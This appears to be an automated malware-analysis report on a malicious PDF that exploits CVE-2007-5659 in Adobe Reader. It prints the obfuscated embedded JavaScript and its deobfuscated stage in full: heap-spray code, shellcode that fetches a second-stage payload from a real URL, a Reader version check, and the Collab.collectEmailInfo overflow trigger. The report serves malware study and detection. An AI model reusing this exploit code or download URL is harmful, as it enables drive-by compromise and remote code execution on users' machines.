MALICIOUS
Risk Score: 308
Malware Insights
MITRE ATT&CK: T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), a common technique for obfuscating malicious JavaScript. The extracted JavaScript stream, javascript_obj0013_001.js, is likely responsible for executing a second-stage payload, though its exact function is obscured by obfuscation. The file's authoring application is Scribus, but this does not negate the suspicious JavaScript content.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (8)
- Collab.collectEmailInfo — CVE-2007-5659 [critical; CVE match: exact; rule CVE_2007_5659]: PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
- JavaScript action [low; 3 related findings; rule PDF_JAVASCRIPT]: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster [critical; rule PDF_JS_EXPLOIT_CLUSTER]: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script: the obfuscated function RR1HDFR(), shown in full in the preview of javascript_obj0013_001.js below.
- PDF exploit shellcode contains an embedded download URL [high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL]: Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream [low; rule PDF_JS]: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Generic recovered JavaScript exploit stage [high; rule PDF_GENERIC_STAGE_RECOVERY]: Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- Suspicious extracted artifact [medium; rule EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info; rule EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://abb192.cn/exp/load.php?id=5655&spl=4 (referenced by PDF JavaScript)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0013_001.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x365 | 6250 bytes |

SHA-256: 833e7ddb4baaa8658ee35d13b3d4b94fa4b547cd1bfba85ebd50190496e46052

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 4 eval/decoder/string-building token(s). 169 of 242 identifiers look randomly generated (e.g. 'OqCTEkDethGxOAgDu65JK732Kq_UZn'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
function RR1HDFR(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function SIIbyB7l5Un9Au(org9wJCHs8RXQV){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(org9wJCHs8RXQV)"+";"+"}");eval("function r93aLXndwOi(SvxLXFOnP){var LYuAfJ4E="+"0,gYaUIzy1c=SvxLXFOnP.l"+"en"+"gth,GeDUC1=10"+"2"+"4,xOqzql,xICa7c,gAX5TW3T0f='',Rs81tEAI509p7=LYuAfJ4E,rJuFvr=LYuAfJ4E,COtZvw=LYuAfJ4E,pbgsU=Ar"+"ra"+"y(63,1,27,15,39,40,36,35,10,7,0,0,0,0,0,0,19,38,25,20,3,30,2,53,0,8,43,28,62,49,45,44,48,29,26,6,18,31,22,9,13,17,61,0,0,0,0,4,0,23,47,46,54,58,52,11,32,21,41,37,5,24,50,14,34,51,55,16,57,12,42,33,59,60,56);f"+"o"+"r(xICa7c=M"+"at"+"h.c"+"ei"+"l(gYaUIzy1c/"+"GeDUC1)"+";xICa7c>LYuAfJ4E;xICa7c-"+"-){fo"+"r(xOqzql=Ma"+"th.m"+"in(gYaUIzy1c,GeDUC1);xOqzql>LYuAfJ4E;xOqzql-"+"-,gYaUIzy1c-"+"-){COtZvw|"+"=(pbgsU[SvxLXFOnP.cha"+"rCod"+"eAt(Rs81tEAI509p7+"+"+)-48])<"+"<rJuFvr;if(rJuFvr){gAX5TW3T0f+"+"=SIIbyB7l5Un9Au"+"(163^COtZvw&"+"2"+"5"+"5);COtZvw>"+">="+"8;rJuFvr-"+"="+"2;}el"+"se{rJuFvr="+"6"+";}}"+"}return (gAX5TW3T0f);}var 
DO34g7DowK06d=implode('',['DVNPY3InfbN','Z1U','yhEomqS@Zh','p9QfFJZp8pthl2','QqHUNnuryhq','9yk','BDtpG0Lei@','3','tT','gbd@','Dy7','DEOG','H@jx2aofi4OZ','eg','bpDpZhCbOn32yh','gV0xJaXZ6gNyR','3XPX','LOMX@yGg4m6','UEOGH@jx','2aofi4','OZe','gb','pm','a0','xJaX','Z6gNyR3XPDp5','4DV0x','J','aXZ6gNyR3','XPmeZhG0L','ei@3tTgb','d@DyhE','omZb','bEGf@cf','n','JZfHrIfV9ufa9','Nn','X@yp@LzMVDu','kcbQ','t','sa','Q','nd','Jby','u','Sjp','m','omfSUNG','YryhG0','Lei','@3tTgbd@Du','ADeZhl2QqHUNnuryhH2bL','hxO','zgvzh','m','3','m','GF9ZhFaj','k5@Z','hEo','z623WP@Fy6','H3WPmomGF9','ZhG','xOAgDu65J','yhEo5GX','2u','fHgyfSbm','hS','RZksE','W6SRZks','EW6SRZksEW6S','RZ6k2EzSR','X6sRBzSRQ','ki','FcASRZA@ScASRZA@oj6S','RN','tkDW6S','RNtY','EW','6SRNtwacz','S','RNt2ojkSRQtk2ozS','RQtka','EtSRZAw@B','tSRZtkUjtSRNt','k2Et','SRQkaREtSRN','ts8EtSR','NA','katkSRZ','kY','Vo6SRN','Aka','t','kSRQkA2okS','RNtk3W6','SRNtk','2E','z','SRQ','kaRE','tSRQzRoW6SRQkTc','Wk','S','RNtT','8c6SRZ6','CoW6S','RNtkgj6SR','Ntk2EtSRN','z','p','aBkSRQzRR','EzSRXk','CcWkSRQkV8j6SRZ','6CRc6SRNtkgBtSRNtk2Et','SR','N','z','paB','kSRQzRR','okSRXzpbWkSRN6@RBt','SRZ6C','SttSRNtk3ttSRNt','k2','E','tSRNzpaB','kS','RQzRRo6S','RZ','6@','cWkS','RZ','6','k9j','6SRZ6CcBtSR','NtkD','B','zSRN','t','k2','E','tSRNzpaBk','SRQzRVEtSR','Q','6AbWkSR','Z6pJBkSRZ6','C','RWkSR','Ntk9jASRNtk2EtS','RNzpaBkSR','NzkaEzSRZtCVBtSRNAp9','WzSR','Qk','i8jkS','RQtC8cz','SRNt2oB','kS','RNtk','2ctSRQ','zTR','EtSR','NApaB','kSR','Q','kaFEzSRNtwgczSRN','tAbjkSRQkaSEkSR','QtCScz','SRZ6','CScASRNtkat','k','S','RNtk','2EtSRZACSEtSRQtVEcASRNA','kDL6SR','Xk','2oW','kSRNtk2E','tSRQkiREt','SRQts','8','cz','SRQ6patkSRQ','6kaWz','SRQkiSEtSRXzk','gczS','RN','6@cWkSR','Nt','k2Et','SR','Qzk2Et','SR','NzpatkSRZA','VVE','zSRQziRLtSRQzpatkS','RZ6CVok','SRNtkbjtSR','Ntk2Et','SRNzp2ozSRQ62F','EtSRQzsREt','SRXz','Tvj6SR','Q62','cjzSRNt','wgE','t','SR','ZA','pJWk','SRNt','k2','EtSR','NApgt6SRQ','k','a','FEtSRNt','s8czSRNtA','bj','kSR','Q','k','aSE','kSRQ','tCSczS','RNz','k3
Wk','S','RNtk2EtSR','ZAVREtSR','QzCRLASRNz','p','2ozSRZthDEzSRQzhD','tk','SRN','6@Soz','SRXzk','JjzSRQzh9EtSRNzpat','kSRZAVVo6SRQziRczSRQzpat','kSRZ6CVo','kSRNtkDozSRNtk2EtSRN','tkbjkSRNApgt','6','S','RQ','kaFEtSRNtC8c','zSRNt4bjk','SRQkaS','EkSRQtCS','czSRQ','t','k3WkSR','Ntk2EtSRZA','VRE','tSRQ','k','a','8t6SRQ','tkgcz','S','R','NtAbj','kSRQ','kaSEk','SRQtCSczSRNt','k3','WkSRNt','k2E','tSRNzA2Et','SRQz','49LkSRZ6','A2oz','SRZ6A2ozS','RZ6A2o','z','S','RZ6','A2ozS','RZ','6sVWzS','RQz','VRE','zSRQkaSozS','R','Z','64D','jkSRQ','z','4g','t','ASRZ6kgt6SRQkaSc','zSRQkaoW6S','RNtCvB6SRQ','zY','VtkS','RQzR','Ro6SRNAh','atkSRQ','kaEo6SRQtTvBzSR','NthJWkSRQzR8Wz','S','RNARVtkSRNthDE','tS','RZt','hgWzSRNziS','BkSRZ','kY8ctSRQ','6','h2o','zSRZt','h9cAS','RNt@8j','ASRQtk2j6SRN','64UckSRNtCvBzSRQ','6TSj','t','SRNth','2','E6','SRNzk','gtt','SR','N6A3tkSRN6','TELkS','RNAp9c6S','RQzVojzS','RZ6','aVtkSRQzVVt','kSRNthD','Ez','SRZARF','B6','SRNtsVt','kSRQka8Lk','SR','QtsSckSR','X6YRozSRNtw','atkSRNt','hatkSRQzTS','jzSRQ','649E6SRNtk2okSRN6w','3Wk','SRN6@8j6SRQzpgt6S','RNzs','SLtSRNz','@8E6','SRNt','kgc','6SRXkaVtASRXk@Ttk','SR','Q6','k','DjzSRQkTS','BtS','RQkYVB6SRX6RFj','6S','RQ6ADB','6SR','QkAaW','6S','RQk','VSBtSRXk@T','t','ASR','Qkh9BtSRQ','kTVBtS','RQ6AatkSRQk2Tt6SRX6k@t','6SRQkaVjASR','X6V','Ft','tSRX6VFB','kSRQ6iFjkSRXk@TW6SR','X64aWzSRZ6','@Ft','k','1vI','ADVNPY3zLi9yGRdck_3','54D','otda','ot6@o','t6m','omGF','9ZhV0','OqCTEkDethGxOAgDu65JK732Kq_UZn','DAzhYp','t','higKf','DEOGH@j','x2ao','fi4OZeg0h','EozLi9yGRd','c','k_','357Dc','5G3xu','k6aW','p@cX6','2','vI','ADVNPY3mZbbEG','f@cfnJ','ZfH354DRQqS','DXP','F3NM','gS5wVJt6RojwV','Jt','6','RoBh','8p','t','hG0Lei@3t','Tgbd@D','y','hE','ozy1','UBdscmZb','bEGf@cfnJZf','H','0zh','9','2XPCeLd','kDQGW2bL','nJIADVNPY3z','eoa','U','y2EcfngLhEo','zpFajk5@Zhooz62Ut6@ot6@vI','7','xaQPaJBxVT','uAD','Vuq','Y3zpig','KfDTLdJUoMo0O4@pWt2b','Lt','_xyq','Uc','cqG9','0A4','gN','yp7Wt2bLt_xyqI','p5pDpZ','h','I@','0','dd9yMz@LdJUoMo0','O0D','et','hG0L
e','i@3tTgbd@DyhIomZo','JtnHDWe87thE35rDVO','GXDyG8qKqDeE','fi3Ud6','0cPpUb','dgvz','hm3m','GF','9','Z','h5','g3xi','DEZDet','hF3ZfXVNnS@NMYabMYDN','nurK','7','aquya9NnX','@yp8p','th','5g3xiDEZDet','h5g3x','iDE','ZX','SNM@','0','OPH2y','puL0t','uTy71S5p','momGF9Zh6q','EPiE','Zk','h3','54D','dOM','C35z','Y','9NPRbIenqEGhaU7H','bOP','Y','gLGgojp3pcyOa','XzG','r','IP','ggKfpUZpTvz75g','3xiDE','Z','XFynF9Nzabm68vI','ADvKM','Dczp6','qEPiEZ','kh706L354EozADVmwDcz','p','6qEPiE','Zk','h7b6','L354','Eo56DVmw','DTox1a','tGaFo','LYe0hUom','68','o','zrU','3ItO9K','kaUWzzgj0DL','thTv5p','DLZrD','cItO','9KkaUWz','z3j0Dej','4D','TthlVzh6qEPi','EZkh7b6L','3z4D8jpDLZrDcI','t','O9K','kaU','Wz','z3j0','DLthCv5','pDpZhH2','bLhxOzgv','IADVNPY3zqHJo663jd','l','3jtTAuxd354DRQq','SDXPF3NMgS5wV3WP@FOwV3WP','@','FKh8pt','hCb','On32yp3DOesTL6Ray6A','gBnO2U73','2Kq_UZn','DL','thaEjAVSjpDLuPvDW','t','@','vQ','M@Rc6WqcZDp54DLuPvDW','t','@vQM@R','c','6WqcZmozGgJufX','Fuq30OP1','D0Gu9NMDet','hhqyq3gK','PXFuq30OMHUNt','ogOn','3JE','qlqypmDNG14KAD','Smh3euf_4th3D','OesTL6Ray6Ag','BnO2br8pthE','35rDeEfi3Ud','60cPp','Ubdgv','IA']);");eval(r93aLXndwOi(DO34g7DowK06d));}
| Filename | Kind | Source | Size |
|---|---|---|---|
| generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x365 | 2547 bytes |

SHA-256: 17002ef5ff1b0221154572269b1ff3345a9f8d32e3ebfda1bf917324caff2d15

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 3 eval/decoder/string-building token(s).

Preview script (first 1,000 lines of the extracted script):
var kWxUbd = new Array(); function Pb4z3(VLHvWGqQypc, duc7MxFsvjUYQ) { while (VLHvWGqQypc.length*2<duc7MxFsvjUYQ){VLHvWGqQypc += VLHvWGqQypc;} VLHvWGqQypc = VLHvWGqQypc.substring(0,duc7MxFsvjUYQ/2); return VLHvWGqQypc; } function cUYCmA() { var a65Kw = 0x0c0c0c0c; var Vm9hc3Ki = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u652F%u7078%u6C2F%u616F%u2E64%u6870%u3F70%u6469%u353D%u3536%u2635%u7073%u3D6C%u0034"); var Xvbt9N5g = 0x400000; var ulm7G6 = Vm9hc3Ki.length * 2; var duc7MxFsvjUYQ = Xvbt9N5g - (ulm7G6+0x38); var VLHvWGqQypc = unescape("%u9090%u9090"); VLHvWGqQypc = Pb4z3(VLHvWGqQypc, duc7MxFsvjUYQ); var HmVR8DqQA = (a65Kw - 0x400000)/Xvbt9N5g; for (var GxHDgml=0;GxHDgml<HmVR8DqQA;GxHDgml++) { kWxUbd[GxHDgml] = VLHvWGqQypc + Vm9hc3Ki; } 
} function MrvPzGLaATy() { var KQOvCV = app.viewerVersion.toString(); KQOvCV = KQOvCV.replace(/\D/g,""); var GOb6t4C = new Array(KQOvCV.charAt(0),KQOvCV.charAt(1),KQOvCV.charAt(2)); if ((GOb6t4C[0] == 8 && ((GOb6t4C[1] == 1 && GOb6t4C[2] < 2) || GOb6t4C[1] < 1)) || (GOb6t4C[0] == 7 && GOb6t4C[1] < 1) || (GOb6t4C[0] < 7)) { cUYCmA(); var lcI3G0yf0E1jOU = unescape("%u0c0c%u0c0c"); while(lcI3G0yf0E1jOU.length < 44952) lcI3G0yf0E1jOU += lcI3G0yf0E1jOU; this.collabStore = Collab.collectEmailInfo({subj: "",msg: lcI3G0yf0E1jOU}); } } MrvPzGLaATy();